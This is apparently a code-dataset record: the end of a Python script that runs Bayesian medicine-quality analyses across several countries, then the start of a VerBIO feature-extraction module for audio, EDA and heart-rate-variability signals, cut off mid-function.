for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(11)
fig.tight_layout()
plt.show()
plt.close()
util.Summarize(logistigateDict_CAM_antimalarial)
# Run with Ethiopia provinces
dataTblDict_ETH = util.testresultsfiletotable('MQDfiles/MQD_ETHIOPIA.csv')
countryMean = np.sum(dataTblDict_ETH['Y']) / np.sum(dataTblDict_ETH['N'])
dataTblDict_ETH.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_ETH = lg.runlogistigate(dataTblDict_ETH)
util.plotPostSamples(logistigateDict_ETH)
util.printEstimates(logistigateDict_ETH)
# Run with Ghana provinces
dataTblDict_GHA = util.testresultsfiletotable(dataDict['dataTbl_GHA'], csvName=False)
#dataTblDict_GHA = util.testresultsfiletotable('MQDfiles/MQD_GHANA.csv')
countryMean = np.sum(dataTblDict_GHA['Y']) / np.sum(dataTblDict_GHA['N'])
dataTblDict_GHA.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_GHA = lg.runlogistigate(dataTblDict_GHA)
util.plotPostSamples(logistigateDict_GHA, plotType='int90',
subTitleStr=['\nGhana', '\nGhana'])
util.printEstimates(logistigateDict_GHA)
# Plot importers subset where median sample is above 0.4
totalEntities = logistigateDict_GHA['importerNum'] + logistigateDict_GHA['outletNum']
sampMedians = [np.median(logistigateDict_GHA['postSamples'][:, i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_GHA['importerNum']]) if x > 0.4]
highOutletInds = [i for i, x in enumerate(sampMedians[logistigateDict_GHA['importerNum']:]) if x > 0.15]
util.plotPostSamples(logistigateDict_GHA, importerIndsSubset=highImporterInds,
outletIndsSubset=highOutletInds,
subTitleStr=['\nGhana - Subset', '\nGhana - Subset'])
util.printEstimates(logistigateDict_GHA, importerIndsSubset=highImporterInds,outletIndsSubset=highOutletInds)
# Run with Ghana provinces filtered for outlet-type samples
dataTblDict_GHA_filt = util.testresultsfiletotable(dataDict['dataTbl_GHA_filt'], csvName=False)
#dataTblDict_GHA_filt = util.testresultsfiletotable('MQDfiles/MQD_GHANA_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_GHA_filt['Y']) / np.sum(dataTblDict_GHA_filt['N'])
dataTblDict_GHA_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_GHA_filt = lg.runlogistigate(dataTblDict_GHA_filt)
util.plotPostSamples(logistigateDict_GHA_filt, plotType='int90',
subTitleStr=['\nGhana (filtered)', '\nGhana (filtered)'])
util.printEstimates(logistigateDict_GHA_filt)
# Run with Ghana provinces filtered for antimalarials
dataTblDict_GHA_antimalarial = util.testresultsfiletotable(dataDict['dataTbl_GHA_antimalarial'], csvName=False)
#dataTblDict_GHA_antimalarial = util.testresultsfiletotable('MQDfiles/MQD_GHANA_ANTIMALARIAL.csv')
countryMean = np.sum(dataTblDict_GHA_antimalarial['Y']) / np.sum(dataTblDict_GHA_antimalarial['N'])
dataTblDict_GHA_antimalarial.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_GHA_antimalarial = lg.runlogistigate(dataTblDict_GHA_antimalarial)
#util.plotPostSamples(logistigateDict_GHA_antimalarial, plotType='int90',
# subTitleStr=['\nGhana (Antimalarials)', '\nGhana (Antimalarials)'])
#util.printEstimates(logistigateDict_GHA_antimalarial)
# Special plotting for these data sets
numImp, numOut = logistigateDict_GHA_antimalarial['importerNum'], logistigateDict_GHA_antimalarial['outletNum']
lowerQuant, upperQuant = 0.05, 0.95
intStr = '90'
priorSamps = logistigateDict_GHA_antimalarial['prior'].expitrand(5000)
priorLower, priorUpper = np.quantile(priorSamps, lowerQuant), np.quantile(priorSamps, upperQuant)
importerIndsSubset = range(numImp)
impNames = [logistigateDict_GHA_antimalarial['importerNames'][i] for i in importerIndsSubset]
impLowers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, l], lowerQuant) for l in
importerIndsSubset]
impUppers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, l], upperQuant) for l in
importerIndsSubset]
midpoints = [impUppers[i] - (impUppers[i] - impLowers[i]) / 2 for i in range(len(impUppers))]
zippedList = zip(midpoints, impUppers, impLowers, impNames)
sorted_pairs = sorted(zippedList, reverse=True)
impNamesSorted = [tup[3] for tup in sorted_pairs]
impNamesSorted.append('')
impNamesSorted.append('(Prior)')
# Plot
import matplotlib.pyplot as plt
fig, (ax) = plt.subplots(figsize=(10, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='red')
plt.plot((impNamesSorted[-1], impNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(impNamesSorted)), impNamesSorted, rotation=90)
plt.title('Manufacturers - ' + intStr + '% Intervals' + '\nGhana Antimalarials',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Manufacturer Name', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(9)
fig.tight_layout()
plt.show()
plt.close()
outletIndsSubset = range(numOut)
outNames = [logistigateDict_GHA_antimalarial['outletNames'][i][6:] for i in outletIndsSubset]
outNames[7] = 'Western'
outLowers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, numImp + l], lowerQuant) for l in
outletIndsSubset]
outUppers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, numImp + l], upperQuant) for l in
outletIndsSubset]
midpoints = [outUppers[i] - (outUppers[i] - outLowers[i]) / 2 for i in range(len(outUppers))]
zippedList = zip(midpoints, outUppers, outLowers, outNames)
sorted_pairs = sorted(zippedList, reverse=True)
outNamesSorted = [tup[3] for tup in sorted_pairs]
outNamesSorted.append('')
outNamesSorted.append('(Prior)')
# Plot
fig, (ax) = plt.subplots(figsize=(8, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='purple')
plt.plot((outNamesSorted[-1], outNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(outNamesSorted)), outNamesSorted, rotation=90)
plt.title('Regional Aggregates - ' + intStr + '% Intervals' + '\nGhana Antimalarials',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Regional Aggregate', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(11)
fig.tight_layout()
plt.show()
plt.close()
util.Summarize(logistigateDict_GHA_antimalarial)
# Run with Kenya provinces
dataTblDict_KEN = util.testresultsfiletotable('MQDfiles/MQD_KENYA.csv')
countryMean = np.sum(dataTblDict_KEN['Y']) / np.sum(dataTblDict_KEN['N'])
dataTblDict_KEN.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_KEN = lg.runlogistigate(dataTblDict_KEN)
util.plotPostSamples(logistigateDict_KEN)
util.printEstimates(logistigateDict_KEN)
# Run with Laos provinces
dataTblDict_LAO = util.testresultsfiletotable('MQDfiles/MQD_LAOS.csv')
countryMean = np.sum(dataTblDict_LAO['Y']) / np.sum(dataTblDict_LAO['N'])
dataTblDict_LAO.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_LAO = lg.runlogistigate(dataTblDict_LAO)
util.plotPostSamples(logistigateDict_LAO)
util.printEstimates(logistigateDict_LAO)
# Run with Mozambique provinces
dataTblDict_MOZ = util.testresultsfiletotable('MQDfiles/MQD_MOZAMBIQUE.csv')
countryMean = np.sum(dataTblDict_MOZ['Y']) / np.sum(dataTblDict_MOZ['N'])
dataTblDict_MOZ.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_MOZ = lg.runlogistigate(dataTblDict_MOZ)
util.plotPostSamples(logistigateDict_MOZ)
util.printEstimates(logistigateDict_MOZ)
# Run with Nigeria provinces
dataTblDict_NIG = util.testresultsfiletotable('MQDfiles/MQD_NIGERIA.csv')
countryMean = np.sum(dataTblDict_NIG['Y']) / np.sum(dataTblDict_NIG['N'])
dataTblDict_NIG.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_NIG = lg.runlogistigate(dataTblDict_NIG)
util.plotPostSamples(logistigateDict_NIG)
util.printEstimates(logistigateDict_NIG)
# Run with Peru provinces
dataTblDict_PER = util.testresultsfiletotable('MQDfiles/MQD_PERU.csv')
countryMean = np.sum(dataTblDict_PER['Y']) / np.sum(dataTblDict_PER['N'])
dataTblDict_PER.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PER = lg.runlogistigate(dataTblDict_PER)
numPeruImps_half = int(np.floor(logistigateDict_PER['importerNum']/2))
util.plotPostSamples(logistigateDict_PER, plotType='int90',
importerIndsSubset=np.arange(0,numPeruImps_half).tolist(), subTitleStr=['\nPeru - 1st Half', '\nPeru'])
util.plotPostSamples(logistigateDict_PER, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half,logistigateDict_PER['importerNum']).tolist(),
subTitleStr=['\nPeru - 2nd Half', '\nPeru'])
util.printEstimates(logistigateDict_PER)
# Plot importers subset where median sample is above 0.4
totalEntities = logistigateDict_PER['importerNum'] + logistigateDict_PER['outletNum']
sampMedians = [np.median(logistigateDict_PER['postSamples'][:, i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_PER['importerNum']]) if x > 0.4]
highImporterInds = [highImporterInds[i] for i in [3,6,7,8,9,12,13,16]] # Only manufacturers with more than 1 sample
highOutletInds = [i for i, x in enumerate(sampMedians[logistigateDict_PER['importerNum']:]) if x > 0.12]
util.plotPostSamples(logistigateDict_PER, importerIndsSubset=highImporterInds,
outletIndsSubset=highOutletInds,
subTitleStr=['\nPeru - Subset', '\nPeru - Subset'])
util.printEstimates(logistigateDict_PER, importerIndsSubset=highImporterInds, outletIndsSubset=highOutletInds)
# Run with Peru provinces filtered for outlet-type samples
dataTblDict_PER_filt = util.testresultsfiletotable('MQDfiles/MQD_PERU_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_PER_filt['Y']) / np.sum(dataTblDict_PER_filt['N'])
dataTblDict_PER_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PER_filt = lg.runlogistigate(dataTblDict_PER_filt)
numPeruImps_half = int(np.floor(logistigateDict_PER_filt['importerNum'] / 2))
util.plotPostSamples(logistigateDict_PER_filt, plotType='int90',
importerIndsSubset=np.arange(0, numPeruImps_half).tolist(),
subTitleStr=['\nPeru - 1st Half (filtered)', '\nPeru (filtered)'])
util.plotPostSamples(logistigateDict_PER_filt, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half, logistigateDict_PER_filt['importerNum']).tolist(),
subTitleStr=['\nPeru - 2nd Half (filtered)', '\nPeru (filtered)'])
util.printEstimates(logistigateDict_PER_filt)
# Run with Peru provinces filtered for antibiotics
dataTblDict_PER_antibiotics = util.testresultsfiletotable('MQDfiles/MQD_PERU_ANTIBIOTIC.csv')
countryMean = np.sum(dataTblDict_PER_antibiotics['Y']) / np.sum(dataTblDict_PER_antibiotics['N'])
dataTblDict_PER_antibiotics.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PER_antibiotics = lg.runlogistigate(dataTblDict_PER_antibiotics)
numPeruImps_half = int(np.floor(logistigateDict_PER_antibiotics['importerNum'] / 2))
util.plotPostSamples(logistigateDict_PER_antibiotics, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half).tolist(),
subTitleStr=['\nPeru - 1st Half (Antibiotics)', '\nPeru (Antibiotics)'])
util.plotPostSamples(logistigateDict_PER_antibiotics, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half, logistigateDict_PER_antibiotics['importerNum']).tolist(),
subTitleStr=['\nPeru - 2nd Half (Antibiotics)', '\nPeru (Antibiotics)'])
util.printEstimates(logistigateDict_PER_antibiotics)
# Run with Philippines provinces
dataTblDict_PHI = util.testresultsfiletotable(dataDict['dataTbl_PHI'], csvName=False)
#dataTblDict_PHI = util.testresultsfiletotable('MQDfiles/MQD_PHILIPPINES.csv')
countryMean = np.sum(dataTblDict_PHI['Y']) / np.sum(dataTblDict_PHI['N'])
dataTblDict_PHI.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PHI = lg.runlogistigate(dataTblDict_PHI)
util.plotPostSamples(logistigateDict_PHI,plotType='int90',subTitleStr=['\nPhilippines','\nPhilippines'])
util.printEstimates(logistigateDict_PHI)
# Plot importers subset where median sample is above 0.1
totalEntities = logistigateDict_PHI['importerNum'] + logistigateDict_PHI['outletNum']
sampMedians = [np.median(logistigateDict_PHI['postSamples'][:, i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_PHI['importerNum']]) if x > 0.1]
#highImporterInds = [highImporterInds[i] for i in
# [3, 6, 7, 8, 9, 12, 13, 16]] # Only manufacturers with more than 1 sample
highOutletInds = [i for i, x in enumerate(sampMedians[logistigateDict_PHI['importerNum']:]) if x > 0.1]
#util.plotPostSamples(logistigateDict_PHI, importerIndsSubset=highImporterInds,
# outletIndsSubset=highOutletInds,
# subTitleStr=['\nPhilippines - Subset', '\nPhilippines - Subset'])
# Special plotting for these data sets
numImp, numOut = logistigateDict_PHI['importerNum'], logistigateDict_PHI['outletNum']
lowerQuant, upperQuant = 0.05, 0.95
intStr = '90'
priorSamps = logistigateDict_PHI['prior'].expitrand(5000)
priorLower, priorUpper = np.quantile(priorSamps, lowerQuant), np.quantile(priorSamps, upperQuant)
importerIndsSubset = range(numImp)
impNames = [logistigateDict_PHI['importerNames'][i] for i in importerIndsSubset]
impLowers = [np.quantile(logistigateDict_PHI['postSamples'][:, l], lowerQuant) for l in
importerIndsSubset]
impUppers = [np.quantile(logistigateDict_PHI['postSamples'][:, l], upperQuant) for l in
importerIndsSubset]
midpoints = [impUppers[i] - (impUppers[i] - impLowers[i]) / 2 for i in range(len(impUppers))]
zippedList = zip(midpoints, impUppers, impLowers, impNames)
sorted_pairs = sorted(zippedList, reverse=True)
impNamesSorted = [tup[3] for tup in sorted_pairs]
impNamesSorted.append('')
impNamesSorted.append('(Prior)')
# Plot
import matplotlib.pyplot as plt
fig, (ax) = plt.subplots(figsize=(10, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='red')
plt.plot((impNamesSorted[-1], impNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(impNamesSorted)), impNamesSorted, rotation=90)
plt.title('Manufacturers - ' + intStr + '% Intervals' + '\nPhilippines Anti-tuberculosis Medicines',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Manufacturer Name', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(9)
fig.tight_layout()
plt.show()
plt.close()
outletIndsSubset = range(numOut)
outNames = [logistigateDict_PHI['outletNames'][i] for i in outletIndsSubset]
outLowers = [np.quantile(logistigateDict_PHI['postSamples'][:, numImp + l], lowerQuant) for l in
outletIndsSubset]
outUppers = [np.quantile(logistigateDict_PHI['postSamples'][:, numImp + l], upperQuant) for l in
outletIndsSubset]
midpoints = [outUppers[i] - (outUppers[i] - outLowers[i]) / 2 for i in range(len(outUppers))]
zippedList = zip(midpoints, outUppers, outLowers, outNames)
sorted_pairs = sorted(zippedList, reverse=True)
outNamesSorted = [tup[3] for tup in sorted_pairs]
outNamesSorted.append('')
outNamesSorted.append('(Prior)')
# Plot
fig, (ax) = plt.subplots(figsize=(8, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='purple')
plt.plot((outNamesSorted[-1], outNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(outNamesSorted)), outNamesSorted, rotation=90)
plt.title('Regional Aggregates - ' + intStr + '% Intervals' + '\nPhilippines Anti-tuberculosis Medicines',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Regional Aggregate', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(11)
fig.tight_layout()
plt.show()
plt.close()
util.Summarize(logistigateDict_PHI)
util.printEstimates(logistigateDict_PHI, importerIndsSubset=highImporterInds, outletIndsSubset=highOutletInds)
# Run with Philippines provinces filtered for outlet-type samples
dataTblDict_PHI_filt = util.testresultsfiletotable('MQDfiles/MQD_PHILIPPINES_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_PHI_filt['Y']) / np.sum(dataTblDict_PHI_filt['N'])
dataTblDict_PHI_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PHI_filt = lg.runlogistigate(dataTblDict_PHI_filt)
util.plotPostSamples(logistigateDict_PHI_filt, plotType='int90', subTitleStr=['\nPhilippines (filtered)', '\nPhilippines (filtered)'])
util.printEstimates(logistigateDict_PHI_filt)
# Run with Thailand provinces
dataTblDict_THA = util.testresultsfiletotable('MQDfiles/MQD_THAILAND.csv')
countryMean = np.sum(dataTblDict_THA['Y']) / np.sum(dataTblDict_THA['N'])
dataTblDict_THA.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_THA = lg.runlogistigate(dataTblDict_THA)
util.plotPostSamples(logistigateDict_THA)
util.printEstimates(logistigateDict_THA)
# Run with Viet Nam provinces
dataTblDict_VIE = util.testresultsfiletotable('MQDfiles/MQD_VIETNAM.csv')
countryMean = np.sum(dataTblDict_VIE['Y']) / np.sum(dataTblDict_VIE['N'])
dataTblDict_VIE.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_VIE = lg.runlogistigate(dataTblDict_VIE)
util.plotPostSamples(logistigateDict_VIE)
util.printEstimates(logistigateDict_VIE)
return
| 0 | 0 | 0 |
d14a481f2aa7e34b8789d4a5d6edd496c4c171c8 | 11,376 | py | Python | src/old-verbio/features.py | jasondraether/verbio | 0db543ebdee05e5cc24556d2239b7eaf215361a2 | [
"MIT"
] | null | null | null | src/old-verbio/features.py | jasondraether/verbio | 0db543ebdee05e5cc24556d2239b7eaf215361a2 | [
"MIT"
] | null | null | null | src/old-verbio/features.py | jasondraether/verbio | 0db543ebdee05e5cc24556d2239b7eaf215361a2 | [
"MIT"
] | null | null | null | """Feature extraction code for the VerBIO project
"""
import pandas as pd
import numpy as np
from scipy import stats
import opensmile
from scipy.io import wavfile
import preprocessing
import neurokit2 as nk
import scipy
import math
def get_df_gradient(df, feature_keys):
"""Given a list of keys for a dataframe, takes the gradient of those features and adds it to a new
column with '_grad' appended to the original key name.
Parameters
----------
df : Pandas dataframe
Dataframe that has columns in feature_keys
feature_keys : list[str]
Keys in the dataframe we want to take the gradient of
Returns
-------
df : Pandas dataframe
Modified Dataframe with new gradient keys
grad_keys : list[str]
New keys added with '_grad' appended to it
"""
grad_keys = []
for key in feature_keys:
new_key = key+'_grad'
df[new_key] = np.gradient(df[key].to_numpy, axis=0, dtype='float64')
grad_keys.append(new_key)
return df, grad_keys
def format_extracted_features(df, target_keys=[], time_key='', repair_fns={}, shift_fn=None, lookback_fn=None, sampling_fn=None):
"""Summary
Parameters
----------
df : Pandas dataframe
Dataframe that holds our features, does NOT contain the outcome (i.e., only 'X', not 'y')
target_keys : list[str], optional
Keep only 'target_keys' and drop the rest. If empty (or not specified), then keep all columns
time_key : str, optional
If there is a time key in the dataframe that needs to be dropped, then specify it. Otherwise
we assume there is no time key in the dataframe
repair_fns : list, optional
A dictionary of lambda functions, where the key to the function is the key
in the dataframe that we repair. By default, every key is eventually repaired
with interpolation
shift_fn : None, optional
An optional lambda function to shift the data back or forward in time
sampling_fn : None, optional
An optional lambda function to upsample or downsample the data
Returns
-------
df : Pandas dataframe
The prepared dataframe for training
"""
if len(target_keys) > 0:
kept_keys = set()
kept_keys.update(target_keys)
if time_key != '': kept_keys.add(time_key)
for key in df.columns:
if key not in kept_keys: df.drop(columns=key, inplace=True)
if len(repair_fns) > 0:
for key in repair_fns.keys():
df[key] = repair_fns[key](df[key])
# Regardless of repair functions, every column needs to be repaired just in case
df = preprocessing.repair_dataframe(df, 'inter')
# Shift, remove time key, then resample (this is correct, see on paper)
# TODO: Support multiple shift functions
if shift_fn != None: df = shift_fn(df)
if time_key != None and time_key in df.columns: df = df.drop(columns=time_key)
# Lookback happens here
if lookback_fn != None: df = lookback_fn(df)
# TODO: Support multiple sampling functions
if sampling_fn != None: df = sampling_fn(df)
return df
def format_annotation(df, window_size=1, stride=1, window_fn=lambda x: np.mean(x, axis=0), threshold=None, time_key='', target_keys=[]):
"""Prepare the annotation features to be used for training.
Parameters
----------
df : Pandas dataframe
Dataframe containing annotations of anxiety levels
window_size : float
Length of the window in seconds to apply to the annotations
stride : float
Stride of the window in seconds to apply to the annotations
window_fn : function, optional
Optional window function to be apply to the annotations. Default to mean
threshold : int, optional
Threshold to binarize the data. If annotation < threshold, 0, otherwise 1
time_key : str, optional
If there is a time key in the dataframe that needs to be dropped, then specify it. Otherwise
we assume there is no time key in the dataframe
target_keys : list, optional
Keep only 'target_keys' and drop the rest. If empty (or not specified), then keep all columns
Returns
-------
df : Pandas dataframe
The prepared dataframe for training
"""
# TODO: Allow to combine annotators
if target_keys != None:
kept_keys = set()
kept_keys.update(target_keys)
if time_key != None:
kept_keys.add(time_key)
for key in df.columns:
if key not in kept_keys: df.drop(columns=key, inplace=True)
df = preprocessing.repair_dataframe(df, 'inter')
df = preprocessing.window_dataframe(df, time_key, window_size, stride, window_fn)
if threshold != None: df = preprocessing.binarize_dataframe(df, threshold, target_keys)
if time_key != '' and time_key in df.columns: df = df.drop(columns=time_key)
return df
def get_audio_features(signal, sr, frame_length, frame_skip, feature_set='eGeMAPSv02', feature_level='LLDs'):
"""Extract ComParE16 features using the OpenSMILE toolkit
Parameters
----------
signal : ndarray
Array of signal data from audio file
sr : int
Sampling rate of audio
frame_length : float
Time in seconds of window during extraction
frame_skip : float
Stride in seconds of window during windowing
times : ndarray, optional
Used to make this broadcastable (unused since times are inferred)
time_key : str, optional
Optional time key to include for a time axis in the new dataframe.
Default to 'Time (s)'. The time is assumed to start at 0 and
is inferred from the sampling rate
Returns
-------
df : Pandas dataframe
Dataframe with the ComParE16 features with a time axis specified by time_key
"""
# Times are inferred!
n_samples = signal.shape[0]
# Frame length and frame skip in samples
samples_per_frame = int(sr*frame_length)
samples_per_skip = int(sr*frame_skip)
# For functionals: OpenSMILE does the windowing for you
# For LLD's: OpenSMILE does NOT window for you. It does leave windows, but those are just from the extractor
if feature_set == 'eGeMAPSv02': feature_set_param = opensmile.FeatureSet.eGeMAPSv02
elif feature_set == 'ComParE16': feature_set_param = opensmile.FeatureSet.ComParE_2016
else: raise ValueError(f'Unrecognized feature_set {feature_set}')
if feature_level == 'LLDs': feature_level_param = opensmile.FeatureLevel.LowLevelDescriptors
elif feature_level == 'Functionals': feature_level_param = opensmile.FeatureLevel.Functionals
else: raise ValueError(f'Unrecognized feature_level {feature_level}')
smile = opensmile.Smile(feature_set=feature_set_param, feature_level=feature_level_param)
windowed_dfs = preprocessing.window_array(
signal,
samples_per_frame,
samples_per_skip,
lambda x: smile.process_signal(x, sr),
)
if feature_level == 'LLDs':
# Since OpenSmile doesn't window for us, we just do it here by taking the mean
for i, df in enumerate(windowed_dfs):
df = df.reset_index(drop=True).astype('float64')
windowed_dfs[i] = df.mean(axis=0).to_frame().T
n_windows = len(windowed_dfs) # sketchy...
start_times = np.arange(0.0, (frame_skip*n_windows), frame_skip)
end_times = np.arange(frame_length, (frame_skip*n_windows)+frame_length, frame_skip)
df = pd.concat(windowed_dfs, axis=0)
df['t0'] = start_times
df['tn'] = end_times
# Just to be safe..
df = df.sort_values(by=['t0']).reset_index(drop=True)
return df
def get_EDA_features(signal, sr, frame_length, frame_skip, times):
"""Summary
Parameters
----------
signal : ndarray
Array of EDA data
sr : int
Sampling rate of EDA data
times : ndarray
Timestamps of each EDA sample TODO: Allow this to be inferred from sr
frame_length : float
Windowing length for data in seconds
frame_skip : float
Window stride for data in seconds
time_key : str, optional
Optional time key to include for a time axis in the new dataframe.
Default to 'Time (s)'. The time is assumed to start at 0 and
is inferred from the sampling rate
Returns
-------
df : Pandas dataframe
Windowed EDA features
"""
# TODO: Not sure if we should window the samples, then extract
# or extract, then window samples. My guess is it doesn't matter!
order = 4
w0 = 1.5 # Cutoff frequency for Butterworth (should I remove?)
w0 = 2 * np.array(w0) / sr
signal = nk.signal_sanitize(signal)
b, a = scipy.signal.butter(N=order, Wn=w0, btype='lowpass', analog=False, output='ba')
filtered = scipy.signal.filtfilt(b, a, signal)
signal_clean = nk.signal_smooth(filtered, method='convolution', kernel='blackman', size=48)
signal_decomp = nk.eda_phasic(signal_clean, sampling_rate=sr)
signal_peak, info = nk.eda_peaks(
signal_decomp['EDA_Phasic'].values,
sampling_rate=sr,
method='biosppy',
amplitude_min=0.1
)
# Only window nonzero amplitudes
df = pd.DataFrame({
'SCL': preprocessing.window_timed_array(times, signal_decomp['EDA_Tonic'].to_numpy(), frame_length, frame_skip),
'SCR_Amplitude': preprocessing.window_timed_array(times, signal_peak['SCR_Amplitude'].to_numpy(), frame_length, frame_skip, lambda x: np.mean(x[np.nonzero(x)]) if len(np.nonzero(x)[0]) > 0 else 0),
'SCR_Onsets': preprocessing.window_timed_array(times, signal_peak['SCR_Onsets'].to_numpy(), frame_length, frame_skip, lambda x: np.sum(x)),
'SCR_Peaks': preprocessing.window_timed_array(times, signal_peak['SCR_Peaks'].to_numpy(), frame_length, frame_skip, lambda x: np.sum(x)),
}) # Meh, recoverytime isn't really useful
start_times = np.arange(0.0, (frame_skip*(len(df.index))), frame_skip)
end_times = np.arange(frame_length, (frame_skip*(len(df.index)))+frame_length, frame_skip)
df['t0'] = start_times
df['tn'] = end_times
# Just to be safe..
df = df.sort_values(by=['t0']).reset_index(drop=True)
return df
def get_HRV_features(signal, sr, frame_length, frame_skip, times):
"""Extract HRV time-series features using BVP (PPG) or ECG data.
Extraction is done in a similar way as ComParE16.
# TODO: We could also just use IBI instead of finding peaks?
Parameters
----------
signal : ndarray
Array of BVP (PPG) or ECG data
sr : int
Sampling rate of BVP or ECG data
times : ndarray
Timestamps of each BVP/ECG sample TODO: Allow this to be inferred from sr
frame_length : float
Windowing length for data in seconds
frame_skip : float
Window stride for data in seconds
time_key : str, optional
Optional time key to include for a time axis in the new dataframe.
Default to 'Time (s)'. The time is assumed to start at 0 and
is inferred from the sampling rate
"""
# Unfortunately, we can't get good enough time series data unless
# BVP is at least 4 seconds in duration
assert frame_length >= 4.0 or math.isclose(frame_length, 4.0)
time_slices = preprocessing.get_window_slices(times, frame_length, frame_skip)
n_slices = len(time_slices)
feature_dfs = [None for _ in range(n_slices)]
for i in range(n_slices):
frame = signal[time_slices[i][0]:time_slices[i][1]+1]
frame_clean = nk.ppg_clean(frame, sampling_rate=sr)
info = nk.ppg_findpeaks(frame_clean, sampling_rate=sr)
